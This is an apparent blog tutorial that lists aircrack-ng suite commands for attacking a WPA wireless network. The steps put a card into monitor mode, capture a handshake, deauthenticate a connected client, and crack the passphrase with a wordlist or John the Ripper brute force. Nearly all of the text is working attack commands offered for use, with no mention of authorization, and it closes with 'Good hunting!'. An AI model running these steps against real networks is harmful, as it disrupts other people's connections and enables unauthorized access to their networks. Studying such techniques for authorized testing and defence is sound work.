Wireless Attack: WPA

The following is a quick-hit list of commands for attacking a WPA wireless network. It assumes you are using a 2016 variant of Kali linux with the aircrack-ng suite installed and a wireless network card that can be placed into monitor mode (which should be about 100% of them). It also assumes that there is a WPA network with an associated client that is transmitting, and that you are running as a user with sufficient permissions to execute each of these commands.

For the sake of this tutorial the AP will be assumed to have a MAC address of “99:88:77:66:55:44” and the client will be assumed to have a MAC address of “00:11:22:33:44:55”. The wireless network card we will use will be assumed to be “wlan0”.

If a presentation is more your style of learning you can access training on this topic here: Wireless Attacks – WPA & WPS (basic_0x01)

First up, boot up Kali and shut down any potentially interfering programs:

airmon-ng check kill

Then put the interface into monitor mode:

airmon-ng start wlan0

Next up, find the target WPA network:

airodump-ng wlan0mon

Make sure to note the client (00:11:22:33:44:55 for our example), the AP (99:88:77:66:55:44 for our example), and the channel (1 for our example), then exit airodump-ng with CTRL+C. Now restart airodump-ng to capture the handshake for the network:

airodump-ng --channel 1 --bssid 99:88:77:66:55:44 -w wpa-capture wlan0mon

Leave that running, then jump over to a new window/terminal and de-authenticate the client to generate a handshake to capture.

aireplay-ng -0 5 -a 99:88:77:66:55:44 -c 00:11:22:33:44:55 wlan0mon

To break that down a bit:

-0 5 means deauthentication attack (pretend to be the AP and tell the client to disconnect), and to do this 5 times
-a means the AP address
-c means the client address

Look at your airodump-ng window and confirm that you have “WPA handshake: 99:88:77:66:55:44” in the top right corner now, then close that process using CTRL+C. Now open up aircrack to crack the password (note that unlike WEP, you have to use a wordlist for WPA). Two possibilities:

aircrack-ng -e {ESSID} -w {WORDLIST} wpa-capture

… or …

john -stdout:{length} -incremental | aircrack-ng -e {ESSID} -w - wpa-capture

The first option uses a wordlist file (in Kali, try decompressing /usr/share/wordlists/rockyou.txt.gz and using that), while the second uses john the ripper to brute force every possible password up to {length} characters.

That’s all there is to it… Good hunting!

Comments are closed.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: